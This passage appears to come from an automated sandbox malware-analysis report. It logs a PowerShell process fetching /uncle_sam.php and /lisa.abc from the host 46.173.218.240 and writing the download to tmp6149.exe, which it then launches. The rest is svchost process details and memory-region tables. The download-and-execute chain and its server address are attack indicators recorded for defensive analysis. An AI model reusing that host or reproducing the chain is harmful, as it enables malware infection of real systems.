| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Get Key Info | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Get Key Info | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Read Value | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xaa4
51
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xaa8
129
57
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
22 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
5 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Read Value | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, type = file_type |
|
2 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 46.173.218.240, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 77, size_out = 77 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = 46.173.218.240, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /uncle_sam.php |
|
1 | |
| Inet | Send HTTP Request | headers = host: 46.173.218.240, connection: Keep-Alive, url = 46.173.218.240/uncle_sam.php |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 284 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 284 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = 46.173.218.240, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /lisa.abc |
|
1 | |
| Inet | Send HTTP Request | headers = host: 46.173.218.240, url = 46.173.218.240/lisa.abc |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 34600 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 34600 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 34353 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 14620 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 14620 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 14620 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 63572 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 63572 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 63572 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8292 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8292 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 8292 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23494 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23494 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 23494 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 60808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 60808 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 60808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2764 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2764 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 24876 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 24876 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 23544 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 38696 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 38696 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 38696 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 20730 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 20730 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 20730 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 64912 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 26371, size_out = 26371 |
|
1 | |
| Inet | Read Response | size = 26371, size_out = 26371 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
Thread 0x86c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, show_window = SW_SHOWNORMAL |
|
1 |
Process #6: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:17, Reason: RPC Server |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:20 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x1d4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
B00
0x
AF4
0x
AE4
0x
AE0
0x
ADC
0x
ACC
0x
7B8
0x
594
0x
250
0x
1C4
0x
298
0x
150
0x
7FC
0x
7F4
0x
7F0
0x
7E4
0x
790
0x
774
0x
75C
0x
750
0x
74C
0x
738
0x
71C
0x
718
0x
70C
0x
6EC
0x
4C0
0x
498
0x
494
0x
484
0x
480
0x
474
0x
1CC
0x
120
0x
3FC
0x
3F0
0x
3E4
0x
398
0x
394
0x
390
0x
384
0x
378
0x
370
0x
B68
0x
BAC
0x
BB0
0x
BB4
0x
BB8
0x
BBC
0x
BC0
0x
BC4
0x
BC8
0x
BE8
0x
BEC
0x
BF0
0x
BF4
0x
85C
0x
858
0x
99C
0x
AC4
0x
ABC
0x
AC0
0x
AD4
0x
AD0
0x
B98
0x
79C
0x
BFC
0x
ABC
0x
960
0x
9CC
0x
998
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00140000 | 0x00143fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00170000 | 0x0019ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x001a0000 | 0x001a3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00350000 | 0x003b5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x0089ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x00c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| firewallapi.dll.mui | 0x00ca0000 | 0x00cbbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000dd0000 | 0x00dd0000 | 0x00dd0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001060000 | 0x01060000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x010e0000 | 0x013aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013d0000 | 0x013d0000 | 0x0144ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x014cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001520000 | 0x01520000 | 0x0159ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015a0000 | 0x015a0000 | 0x0161ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001620000 | 0x01620000 | 0x0169ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0175ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001760000 | 0x01760000 | 0x017dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001810000 | 0x01810000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0190ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x019bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019e0000 | 0x019e0000 | 0x01a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a60000 | 0x01a60000 | 0x01adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02362fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002960000 | 0x02960000 | 0x02a5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dd0000 | 0x02dd0000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
